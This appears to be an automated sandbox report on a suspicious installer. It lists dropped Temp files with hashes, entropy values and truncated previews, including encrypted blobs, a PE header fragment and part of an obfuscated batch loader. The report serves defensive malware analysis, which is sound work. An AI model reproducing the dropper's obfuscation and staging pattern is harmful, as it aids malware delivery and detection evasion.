Preview:	.Sy......=...-.I.&r..B]..4YXZk.~....y..ZG....s.A..NM.l...3.%....o.^/....%.r..d..U.....7#c......j+....htQ=i...B3...^..e.._.z.W]..3.m...y..D..,...VX.K$0w....]....6H..2d..6:..m....e.....}...[.. ....8..F3wK..b...:%......" Uxn..s...b...".H.!.\.....m.x.G...GX..f)?R..OP..c...-.CXY..f..(gR.kR()m.bS.=....9...u.._q.W...g).%'.Wp..&.ylF)y.z..e+Yk.y.......B...)..W....O.>.......J..F.Q.Z.....Y.. ....J..=.....6&......#.....i......;....Vm.......R.P.T...-...fH..g5.]r{oIBw."....Q..e..81.h.u..:...9...}.$H.t.....z..b......r..........w.n....(LQ[3....p.1...\..Y..V.2.q.+p...E..b........H...@D.D......%.."%.t.3._1...)..vB.R..#U..b....i_c... ..6k...6.t..v.4.3E....l...r2...\|0.X...c.v."..+......Y....7.1.0\|8wT.~.7......P.3X...1xb4.]...9..~.cV....Qf.=5^...=,.F..~&..$P.N.Q\..`.W.J..0....{..w.......3./...NVd...G.......kp.,.....,..m.\/.......F..UQ..}.{...,M.;.......,....YT*.;$.K.......G....@..)..2.........r...1....N..lX....1k.7...I.......(..S...g......O..S.>.d..H

C:\Users\user\AppData\Local\Temp\Effective

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.997876793578293
Encrypted:	true
SSDEEP:	1536:RVGkEVhQjr49w1KuVUU7RXkS6VFMivQ5LJ109nOg+1FBkNDgvo:ykEVhQjc9wAu+U7mS6xvY1kk1FBACo
MD5:	AF13AAD8BD1F6DD28912CE4DBB4448AC
SHA1:	70D5F2A06E576C46E1DD5CAD5E8245EAD119B8FF
SHA-256:	59E301046236D74AEF18E13CC826F2A1C14F93009ADF71ED2F920A6F71EE7B7A
SHA-512:	26FB87D1CAA02FEB2C5561CFE6354AF658CD1D1760FCC867341A961B426327FC127C35CE6740C29DC7B2019C1ED0D54C7881A0455EBC52A9355434AEC2F98420
Malicious:	false
Preview:	....@......U.0...R....%\I..D~i...&n.x..dK.!k...N..P..5....4.e>L.Y....[..2.$t...>.....l.3U....\.m.\..x.9...0>..d..3..4.-.......H...2....e..U/..8..p............F..a.q`Aq\|.q...}....;.:>.....N..`2.l.y.)._F .@_./g;....MQ`..h.3".+.PCo.b.V...c@CZP...6CoF.8....+#N...k....=S.7.......+....T..(......3.$9....:......#.`.nj....5.kI....g.}..VQpq.....{.....'M).P7T.x.m...7<......eA..$..P............`.M].?.8/-b-....\|/.............j...?y]KP...b<.3. .C..X....#TW.+..................!....W.C~2......PV...v..u..T3m..'.VS.+...u.......m.,..Q..Q....7..!...%.Xm)...I.@S.J.jl..c....e.~>]..x.G..OX{..}.w........HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...5.=.'.F...h.............iW..&...iW..&...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~

C:\Users\user\AppData\Local\Temp\Exhibit

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.6483765519522
Encrypted:	false
SSDEEP:	3072:ZCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj8:ZCOMVIPPL/sZ7HS3zcNPj8
MD5:	EAB697C79BF8A1996A376B359846F13C
SHA1:	739AABBC29055363EB02121C519139EEBEC4C654
SHA-256:	F235C4CCDCB327501DC648D9E488575FF5F5E022053B77C1F689126873760411
SHA-512:	F653576C4CB745708A9A3E359CBFC1E2A3C1FBDE248670A817964DFDB53F12BB19122F4D166941B02043459D92232F24F759BA55BFF67C15E673896844EDFE0B
Malicious:	false
Preview:	..........L..........y.I..A.....E.,K.......K.... cL....................H.......E...........f;...q....FD.....E...a.........Y................;............Fh..................j..........f;...z.....FD......k.........c...;........Q....V..N\|..t%.E..}.;.sSW.F.PQ.M.............d....5.V....+.E.;.w#f..f;F4u......A....E.f.@.f;F6..0....}.E........t=.F\|.M....;.u-.~..u'.~..u!f..f;F4u..Fh...........~...i...}.E..N\|;...=T......E.........;.......f.......f#......f;........E.......E.;F\|...S.........E..]..D....E.;F\|...S.........}....E.t0..%....=....u".E.............%............E...........5....FD...........#....E.;F\|..qS.........}....E.t0..%....=....u".E.............%............E................FD...............E.;F\|...S.........}....E.t0..%....=....u".E.............%............E..........._....FD......H....M....E.;F\|...R.........}....E.t0..%....=....u".E.............%............E................FD................E.;F\|..0R.........}....E.t0..%....=....u".E.............%.........

C:\Users\user\AppData\Local\Temp\Expected

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	ASCII text, with very long lines (1240), with CRLF line terminators
Category:	dropped
Size (bytes):	26036
Entropy (8bit):	5.096582818860482
Encrypted:	false
SSDEEP:	384:oukDekjJVi6yO7iNgWrUoztbXDQockPrxLmsnv3lG8AFipjocZ4:we6v/21U8bzQDcrvVzAGw
MD5:	CFE69139A330974529BE5A4080F825A7
SHA1:	21D9623BA56905E73C681ED7F39CEE008C506981
SHA-256:	75764C175A7FFDCEDCC012734842B2AC82AEDF3EE56453467CBAB67641A87B52
SHA-512:	866CDCE03F8900C3D0472E6230C38AAF49D0D29E0357A773693610A5ACFA5E8F2FC4253B88548D469D1B8020D95F0F11BDFC5E791496190022A698D79CF7A6D2
Malicious:	false
Preview:	Set Trips=j..XXgTin-Joined-Browsers-According-Wordpress-Announcement-Extend-Infrared-..wVinCent-Coleman-Fake-Holdem-Reseller-Ui-Portfolio-Talk-..ABZRailroad-..sCPForward-..QKlAndy-Sagem-Alternatively-Trust-Inbox-Framing-May-..teAccounting-Lobby-Consultant-Federation-Boulder-Airlines-..FnUruguay-Notifications-Banks-Mines-Jewel-Cable-Careful-Boolean-Jurisdiction-..nuQt-Chemistry-Paul-Vhs-Villas-Chart-Whole-..qIOdNathan-..Set Select=H..tBkGLa-Telecom-Loan-..pINavigator-Songs-Slip-..lzLooks-Injury-Champions-..hBRLDurable-Parameters-Oz-Brakes-Standards-Novels-Jeffrey-Supporters-..uBDemanding-Because-Lauderdale-Attractive-Optimum-Novelty-Porn-..pNcReports-Copy-Golden-Valve-..XynAssurance-Demo-January-Mart-Medical-Govt-Wm-..XUtMission-Ebay-Fu-Passport-Transfer-Outside-Trackback-Cheats-..HBEdt-Found-Pad-..Set Copper=r..JpCio-Text-..jaAsia-Carriers-Wonderful-Modular-Tablets-..bhIGerald-Conservative-Senegal-Wrestling-..EzUScript-Weblogs-Blair-Humanity-..seDaisy-Villas-William-Gas-Led-Cellular-Bl

C:\Users\user\AppData\Local\Temp\Expected.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1240), with CRLF line terminators
Category:	dropped
Size (bytes):	26036
Entropy (8bit):	5.096582818860482
Encrypted:	false
SSDEEP:	384:oukDekjJVi6yO7iNgWrUoztbXDQockPrxLmsnv3lG8AFipjocZ4:we6v/21U8bzQDcrvVzAGw
MD5:	CFE69139A330974529BE5A4080F825A7
SHA1:	21D9623BA56905E73C681ED7F39CEE008C506981
SHA-256:	75764C175A7FFDCEDCC012734842B2AC82AEDF3EE56453467CBAB67641A87B52
SHA-512:	866CDCE03F8900C3D0472E6230C38AAF49D0D29E0357A773693610A5ACFA5E8F2FC4253B88548D469D1B8020D95F0F11BDFC5E791496190022A698D79CF7A6D2
Malicious:	false
Preview:	Set Trips=j..XXgTin-Joined-Browsers-According-Wordpress-Announcement-Extend-Infrared-..wVinCent-Coleman-Fake-Holdem-Reseller-Ui-Portfolio-Talk-..ABZRailroad-..sCPForward-..QKlAndy-Sagem-Alternatively-Trust-Inbox-Framing-May-..teAccounting-Lobby-Consultant-Federation-Boulder-Airlines-..FnUruguay-Notifications-Banks-Mines-Jewel-Cable-Careful-Boolean-Jurisdiction-..nuQt-Chemistry-Paul-Vhs-Villas-Chart-Whole-..qIOdNathan-..Set Select=H..tBkGLa-Telecom-Loan-..pINavigator-Songs-Slip-..lzLooks-Injury-Champions-..hBRLDurable-Parameters-Oz-Brakes-Standards-Novels-Jeffrey-Supporters-..uBDemanding-Because-Lauderdale-Attractive-Optimum-Novelty-Porn-..pNcReports-Copy-Golden-Valve-..XynAssurance-Demo-January-Mart-Medical-Govt-Wm-..XUtMission-Ebay-Fu-Passport-Transfer-Outside-Trackback-Cheats-..HBEdt-Found-Pad-..Set Copper=r..JpCio-Text-..jaAsia-Carriers-Wonderful-Modular-Tablets-..bhIGerald-Conservative-Senegal-Wrestling-..EzUScript-Weblogs-Blair-Humanity-..seDaisy-Villas-William-Gas-Led-Cellular-Bl

C:\Users\user\AppData\Local\Temp\Handbags

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	6.318578020476229
Encrypted:	false
SSDEEP:	3072:1Zg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2Uj:1K5vPeDkjGgQaE/loUj
MD5:	D95F8431D62495080F59E5E4B8EB847B
SHA1:	33F66C070377B5F91BCB493214D5C1B8124FE02B
SHA-256:	131117AC28A5FD15E90F71CAC7E33286BAF16AE869A50422D297D0242C7610E5
SHA-512:	765BB929C51EE545150AC98067F152D27E1E09C1DF98FB792AEEBA2FA7C1DF3C862D2508785D7553428D878613C6C153B475000EF7EF5855B917318CBDD741A2
Malicious:	false
Preview:	[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M.

C:\Users\user\AppData\Local\Temp\Harder

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	7.997704372452459
Encrypted:	true
SSDEEP:	1536:Km2qi0TT6RebVhfQVLNQruw0N9xG0zUUDF9Sqcszr+RDlDRzCCC05rO:JKRebVpiw0TXIq94E+NlVuCC0o
MD5:	068CD09E7FF353985E872715A2565105
SHA1:	E7DAD733369FB78E72483C3C9DEB5AD72E514E91
SHA-256:	55AD932C1FC3699D9D29B2C86DB8775819BA436A1810B1676D34E1279C05F59B
SHA-512:	9822B261296ABF13BE5367DB9333FF172F3A9ACFD7D5F21C94F73F56F1D41955BCA0023BB8067B13DB4F1188AA960ED8DBB3F3481D97BB84773862D1E22AFB29
Malicious:	false
Preview:	~.v.....&9.]......mA.\\.C. $=.s.o....P.n.l+......(....T"9.e,?.a........D.. aG..2...]..?O...h....q..VF.(.H._.RG8W..adC....[.f.N ...FE.Q.......}.4cX D..R...E..<(C...x.'..3'%.C.I...!.......B1.....S8......^&...~F...-....t..'..=.:..f.b=..q-%s.j`..S..j..X.V....`..X.$C?..@...>.o.S...1.f,.....J...).p.qZ.P/O.u..m..is.."E.......s:.(...:.Ns..v?../..l.u._..P....m.r.3a...'.......oi.....".,./..z...._.{.\|Y...G./.8......1......_.T..6Rvoho....`..Y~dil...,Q...S....as...!..w...S...d.F...+..;).....H....KC...S....."..GNo..0n....+.P..l.K.7t.....$.q{.v.Q^.[7c).....3[I....k1..m..T:nJ..{..Ol.....v..5..e.l.P.l.7.&.......?...V...+.j6~..%.&......#.k.}..0.X.yg...l&.h..6..]].b.....ig.N..Y.....R33..7..C.x.....^./..5\|.M...M^..\.H..()..t..V.W.F..G...)..;v.a...5......[T.V.....6Y4n.r..BK....!.....=..BI.._...3.p.G..L..EY.S.lc...U..~.i.D.;cx.w.o.)C6c%%....!Z.G$.....6.._..,.d'.....L6..4=...A9~A..3..+....<\....g....p4.XX.}[.+...j<.U.vr...c.,...N..x..G......H

C:\Users\user\AppData\Local\Temp\M

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	4.803491264264377
Encrypted:	false
SSDEEP:	24:syGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+JvU1SX6u:t9n9mTsCNvEQH5O5U1nPKrhBzM1Fu
MD5:	5CAC4ED1F354860BA6420E94EE340F6D
SHA1:	6910481C1C150B27B54606B5994C7224C8640011
SHA-256:	57A441BB2C25C5D1896CFBF112F051990389B8DD64F316E5C5658A92D533FC9C
SHA-512:	6AF0960A798B656FE5D115FE3491F6F75AFB994B35DFB2606CD403288A59A9A41D1A961492BA01C8C7F878519ACC56E43F55C6F03558A24031869C959889FD84
Malicious:	false
Preview:	brandon........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Mf

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	55578
Entropy (8bit):	6.831228016941532
Encrypted:	false
SSDEEP:	768:pr2+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:d2+9BGmdATGODv7xvTphAiPChgZ2kOE6
MD5:	3AAB4AAD6EDA212E09D41BA64FBBBF0F
SHA1:	FFE98558B407CE9F971ED71D07A555B85F0F1CC0
SHA-256:	179AF49073D90B1AE5F7CEE235318CB602BD01E2E0EA15A3A2BFDE1528F4A989
SHA-512:	2554EE3A0C353A75575D079EAA81EEDD0B12B6C707D3B8863E16368FC796A6A9E3F2659A92C47F2844C9AEC1091D591851426158A5950DDD8B9752AA16D00859
Malicious:	false
Preview:	]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...^........................k.................................]...]...e...o...o...o...o...o...n...]...]...i...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...h...]...].......................................................b...]...]...p..............................].......................................................................................]...]...a............................W.....................]...]...]...]..............................q...].............................................................................]...]...]...].......................W.........................]...]...]...]...]..............................`...`.......................................................................d...]...]...]...].............................................p...]...]...]...]...]...f..............................]...r...........................................

C:\Users\user\AppData\Local\Temp\Organization

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	5.093773221340636
Encrypted:	false
SSDEEP:	1536:OKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZw:Q6whxjgarB/5elDWy4Zw
MD5:	29CCC6B6DB8D7842066F428005610B08
SHA1:	60902EC9523DC9D228BA46F99C0A858F7C1D8985
SHA-256:	27DC8A337EF502330E0C066240B2E2C3A621FCBF5314AAF1B6A30CD934AEB178
SHA-512:	C60D6F7237C00F0D4314E970448BD9FE43DFA78087CC7719341B573986A463FB5F15E8464B72615D148D4062B8E7F262A5E137B35B24DF100864F6BF8A594C37
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Planners

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.997824134918433
Encrypted:	true
SSDEEP:	1536:HdjXwEOd/7FoBfmTHEn34fAuOIIEfvYQ06cIwk33+JFgSo2tNf10eOLW3sqsoDQ3:H5w5TFoYIhEvYDNK3Mip2zf10nLW3sqo
MD5:	5813CD191801B14B95F7FBD8EA3DF3E1
SHA1:	CB54AD79ECB01FF0E9CCEAE9836D11BDEBF64C00
SHA-256:	FF93EFAA042B75DFDF1CC826901BE4CF12300D83D57011AAF9F6BDC492888D4F
SHA-512:	0D443E67124C27CE5F63826198601B97FA2D84A5E2F9E8CC7C2EFC9A07624E6039F80C205E3F1CF2D66A3611D2FAE3D9055BB0DACB12ECFB0EBC433434F67C3D
Malicious:	false
Preview:	.9,>\.0..C...~..[......c.V_i.Cv.n....8. X.]../D.}b.K..3..\..z..`.!.S....'.pO..O.&..AXg...7.....%=@...X\b...3.....:.C...."\|..%Gat~....:.G...;....9.SG....A,.V4 ..+......w.............b65..j=...._.w../^lt%.j...z. _D..{./..-......x}#>&c.C.r3...3..R9)..v.\|0.P.X.].C5..v.Y.:I..9X~.....:.-...:7......8<.c.X.x&...+D....f..........4z....m"....A!&.Ig92./.wt}..1.a.....l7.H..(.i.....!..k>Bk.@.D..bE&?.+.c\..I......\.....u.H.A.h.,..kG.Sl?.....\..u.}l..0...S..+.c.)..D\|......!.6.R......3.....{p...'.8..-...~..4...a.K...El#..../.F#...Z..U...w.p.h.3%h...........Y....a...7.T.I.....X~TYjqIyg.Nb..2.!FV...H.)...M..)....~....i../......v..:$1.7.....7..>....bL........9G.......?..r....]..$."'.........8..l.!~.rU....-.._~.C5.h...,...PPZ.B.^....h..Md....b.Q.dtO...!B.&..}e4s..\...9\...H6...q..C...p*-.........Zc...g_g..v.....+.u.w...3.G..............%.....x...i.....(.B.~.6.L(3.Z...b...\|F..TH.P..U..(wT..;2W.hG..k.. B...Ui ..M.....&,.$.3..c..s..R......&k.(.>..j.8......B.

C:\Users\user\AppData\Local\Temp\Riverside

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.700143120271754
Encrypted:	false
SSDEEP:	3072:HQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAN:Htf0accB3gBmmLsiS+SAN
MD5:	82E2E8DAB38A84EDD1CD7853E02D20C3
SHA1:	4649563A9C003AAD2130C1E253D0F746DDF90ACF
SHA-256:	605200D39960B4EA829DA3D4D3585BE49AACBBEA10F47CB0E329546E0E1D1B6F
SHA-512:	AFE19AAA285F86C3E9C05EF6CF35AA571812F25B0D1F8439AF74CB24455B4C351CA5ED42C1B324E5300DD06E28C7BC0B98414ADB536214430A25FCC342ED5FCE
Malicious:	false
Preview:	......6.....YY^..^......3.@;.u.......t.2..U..}..VW..C....}...u..}.V.u.W.u.j.u%h......T.I...~....u.;...x......_^]...h......y..u....y...A..@.t.@..U..SW..3.9_.u..u.........G._[]...8_.u.Vj..H.....Y.u...^..}4...^..G.....#G..F..w.^...u..O......_..S..QQ......U.k..l$.......SVW.M.3.h.....M.f.......e...3..E...C..0V.4..)K...q..YY..t.G..a\|.u...a........`w..$...A.......P.K..^...3..}.M.......E._^[..]..[...h..I..K...............s.......3..F......>.I...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E.#.E.'.E.+.E./.E.3.E.7.E...E.;.E.X.E.w.E...A...E.O.E...E...E.3.E.".E.>.E.O.E.k.E...E...E...E...E.Z.E.v.E...E...E...A...E...A...E...E.0.E.:.E.h.E.s.E.-.E...E...E...E...E...E...E.r.E...E...E...E.\|.E...A...E...E...E.6.E.J.E...E...E...E.R.E...E...E...E.!.E.7.E.M.E.c.E...E...A...A...E.y.E...E...E...A...E.}.E.f.A.f...f..0f;......y..u....y...A.t..@..V.......j.V.v...YY..^...Wj@.04M.3.Y...!.05M..._.U..QQS.].V.u.W...E..F..U..M....f.x.3.......e...M.j.Q.0.......

C:\Users\user\AppData\Local\Temp\Stones

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997942528078247
Encrypted:	true
SSDEEP:	1536:wi0cZlTOuyJt1g/3vW/WQMWYYxGJkFYIeZvJsZjhG7tra2ZGtWC:TlTKJt1gf2MCUJkqIYviAtra2AkC
MD5:	D007B328A7E67AAC5420453408D25C0E
SHA1:	60C95E6455373FADEF904E9A880C52EF3CA77B8E
SHA-256:	166E0A74F3D585B17EAC4E3B31C98EDF649F1B03ED8560A94713D71CF2D932FF
SHA-512:	A8A4200976BB949C0836E2AD6BC328B4CAEADA4E14B79AB63FC2FB1C132EF0B2ABA0BADF89095BF77E5CC5F379939673C4A6E5EC51636940D22C593908347B3D
Malicious:	false
Preview:	.o.w..~`A...kH0..m.O.H..4.M...$..i.I.Q.<k........"T....m_RN.R.....2K^......`Y.nw.{vu.....^... PT.M[..\(..)........".Yw.gN]7..!......lK...n5....._..$4(/^.e=f@......pA..6.:G.9....g..c...K...M;..w..+..&..pn.i&..J..}..l.........h'."..\|..._....%!.'?..~.%.u(..8......Ch.#.H.t..#v_?.~..<x.....0...6......Q.t.w..?2.=.,v...I.)......X.$.....8".".b=......Kc.r.(..j0cZ\|Q.r..._.....5.0..=..\.B..z...Ta6.Z~...Mk..D(.Q..7G..].k...7e$.6..._..DjB..A,Bo...[.[U.9.j.-g^w.N...... j...>.......!B........H.0.uI.r7...X..k....R.W.&o. ..zc.....&..0..M.......)..z.......O7W..\|.-.n...L.'.m..z.jG..px...<....E..Z.4.x.MP..e_..u9.'F...;S.l.$..s-...y......Ds..X..p.n......8.2.V......x_g....E>w..,.v........=.e.......{.....>..9....C.rm?.D6..x..Rc.P.<.K@...V.{Rp.f.5.)...w..t.+N...N{.&...@O....ALP.(g.6=.^$H....?Y.k...)"...;.J+xB...._.)...4..7E....!..48U.%..'g...AE3.~.\....WP>.j..=b.."+..6.?.....e....L.B.5.V6......8..!k.9.:.A..([......od..:..b(8c...0L..a.$.l.a...1..z..W...

C:\Users\user\AppData\Local\Temp\Straight

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	6.625425277541543
Encrypted:	false
SSDEEP:	3072:BnEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIX:BnEo3tb2j6AUkB0CThp6vmVn/
MD5:	490590D7099C402F4614B5CF00004420
SHA1:	E3060C0F79C55E18DE28E3AEB8529901938D5292
SHA-256:	2A7AFBF76ABCC1D5917CF011B016C2C4C915D7F8B263BBF74A09060DBEDE9418
SHA-512:	703F9A0D1AA47091A90D507F72CD35F83CAA402CB10B8DAFC3945562DB6DBB05A76CE78F9F93D17EF94866055F95D0BC3A70B9CA95011B9B5401D44F86872491
Malicious:	false
Preview:	YP.D$DP....I..G..t$....t0...t....u>.w..D$DP.4...YY.(.w..D$DP....YY..t....w..D$DP.w...........u.F.G..u,h.....D$DP.u.....I..D$@Ph4mL......YY..u..t$..O.C.........h.....D$DP.u...t.I..D$@P.L$$.*_...O4.D$ ;.t.P..j...O4.A..A..A...L$ .ri...O4.G....t/.G..u(h.....D$DP.u.....I..D$@Ph4mL..H...YY..t.F.O.C...tYh.....D$DP.u.....I..D$@P.L$4.^...Ol.D$0;.t.P.=j...Ol.A..A..A...L$0..h...Ol..G....t.F.O.C...t.;.u..u..........t.F.O.C......tk.D$.P.u.....I..O...y..D$.9.....u.FC.T$.......t.9.....u.FC......t..D$.+D$.9.....u.FC......t..D$.+.9.....u.FC.. t.;.u.............;.....u.FC;.u..E.P.......O.............t.3...3.@_^[..]...U..V..~(.t..u........u.Vh.UF..u.........\|.I........u.2.....^]...U..M.].....U..QSVW.u.....P.I...u..{........3.PPj..u...H.I..E...u.......E..p.3.j.Z...........Q.7...Y..WVj..u...H.I..M.3.f..O....3.F.,8S.u.W.b...YPW....I..s$W....YY..t.......3.W....Y....W....Y3.@_^[....V...6..l..j.V.}...YY..^...U..W...O...0.I...t.V.q8Q.......u.^.E..t.j.W.C...YY.._]...U.....U.SV..3.u.W...~....N(.N0.N4

C:\Users\user\AppData\Local\Temp\Suppose

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	data
Category:	dropped
Size (bytes):	36038
Entropy (8bit):	7.994518180793861
Encrypted:	true
SSDEEP:	768:DgT1WuuwDwOKYF15yfWJTkKR1w4eU9sjYDGufV7WLdg:Dg5WUDwLfWmKR1A+sjMGG8O
MD5:	FE57C7DDE39E57445EEFDCB89031E551
SHA1:	EEBC5A8465A5DCA39B46904A6A0B4A64B9A1ADF5
SHA-256:	8628B0894A5EE5600649D3054B4CEDE4D30201442D1FD34BAB007B8AD92C4F75
SHA-512:	7E27D8B333F9F8D7C19B4D640B0F3824045D39C238B60427F960902511B02AA4B3746F063B2E921F0D5B4DE9ABFEB8CC915164504E5EE92E56595C3D847F9654
Malicious:	false
Preview:	i..4M..(.(L..;.Ha.....xK..6....W=..?.].?k..&....I.VQe..v.!.l?.l..d.W........H..i.n.T..5...ay(f..Z.D...U..M.P..@...c...i.{.]n.{}m!Gm.7..$r.g2.q8.0.....E...'.3.u.b).%sT.:.m@.1..c.....?..c..\..4...).......O...Q..k.O..2.#V)>..kM.......y..2....Rxh'...6......S.3_6....GhI..y..1.&w..t..&.....&...o.E.m......--.._.v.S......B....G.U..j..}=fS_..(.)FI+X..........p.rD.;...Bsl.uu..tA.......;..LIn.}p..[.....=.U.qu..........i`-..9]Z\..r..2.c.t.u\9.C=.o.O....^.H{W......).....I.....C....T.o$...O-......-?x>(.Q..!....u..@.k.-Y....}..,.......:...p...P.?._....._.:B1.Br.{..QB./>.8f@.I=U&.?<.f.q'.0{".....M....S...j..P1..T3..5%P.7_`,..<.e...<.:..v.1...=a...yT....BE..F...3._..u...4.(c^...^w.K.yg.h...BB...xF[q......Y.3..T#.3,.ne..a..s.W..>.....K..~...YT..5..I.z.Q.N..;.Q:.......t.+.4.T./&E[.Z.9...8?W..:...7....?xR...{...._.%;.y..E.m..&.J...Z.<.cA..,-B.3k...../......`wD-6I...,*... ..1......+.F....y.j.~S\...5l.M......_.l.}PQ....b....p....w..W..`2.)..!.......%[s....e.

C:\Users\user\AppData\Local\Temp\Turkish

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	6.60309115168509
Encrypted:	false
SSDEEP:	3072:rv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jM:LphfhnvO5bLezWWt/Dd314V14ZgP0d
MD5:	137079AF2899310647BD0D4DC68D2E93
SHA1:	5946B5A03B7083B26242D3B81CC630523719CC07
SHA-256:	E2707F0B325FB1F3A855A6F11CAF45550CB5BFB9969A48EDA02303AE09E5449F
SHA-512:	4495CBEC0AA29A208AB4F0210E9491B5BF3BE827981577BEAEEECDF44829B821178B673E77A50F765FE40376168FB8C9060C3BC2B557F77BCC7DEFD0F6665CDA
Malicious:	false
Preview:	....H.....@..}..]..E..{...~.=......P....I.f.C........H..\|1...D1.t..@8.@......\|1...D1.t..@8.@..2._^[....U..QQ.E.S.].V.u.W.#....C..............E.i.....+.i......E..E.P3.P8E.t.SP..PSP....I.....u!8E.tu...H..\|9...D9.t..@8.@.L'...G~)S.u.....I...uI..j.^.H..\|9...D9.t..@8.p.....$.I....I..\|9...T9.t..R8.B..\|9...D9.t..@8.@.._..^[....U..QQSW....3.E.QQ.x.GW.0j.Q....I..E...u.......@V3.j.Z.........Q....Y.u....E.VW.0j.j.....I.H..Pj.V.YK..V....Y^_[..U..}..V..u.QQ......g.u...S..Y.N..F......~7.B.j........Y.......F..F....u.j.X........P.F..'...Y....P...2....F.@P.u..6. ......^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.e....'..N._^]...U..QQSW....3.E.QQ.x.QQGW.0QQ....I..E...u........3VP....Y3...E.QQ.u.VW.0QQ....I.HPQV...(...V.h...Y^_[..U..E.Pj..u..u..u..8......p....Q.wR.......y....].U..E..@....y..u....I.....u.V.u....&....&..F.....^3.]...U......DS.].V...W.t$......3.3.G..P.{..D$...p.I.;.u...t.I..D$ P..l.I..]..d$(..d$,.j.Xf.D$ .C......................tq.....j....C..p....O...F....D$..C..p..

C:\Users\user\AppData\Local\Temp\Utils

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	149504
Entropy (8bit):	5.684948439111906
Encrypted:	false
SSDEEP:	1536:ASfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPS:ATq8QLeAg0Fuz08XvBNbjaAtsPS
MD5:	6B51A5DA97530A7AE324C3C9F88C8924
SHA1:	238A7540DB2B5690C99887ADE3507560535BE2C4
SHA-256:	E7CEECA8A39642EC6997FE0E19E9D22DDB916AA2C55D19E7ED52B88372F4AFC7
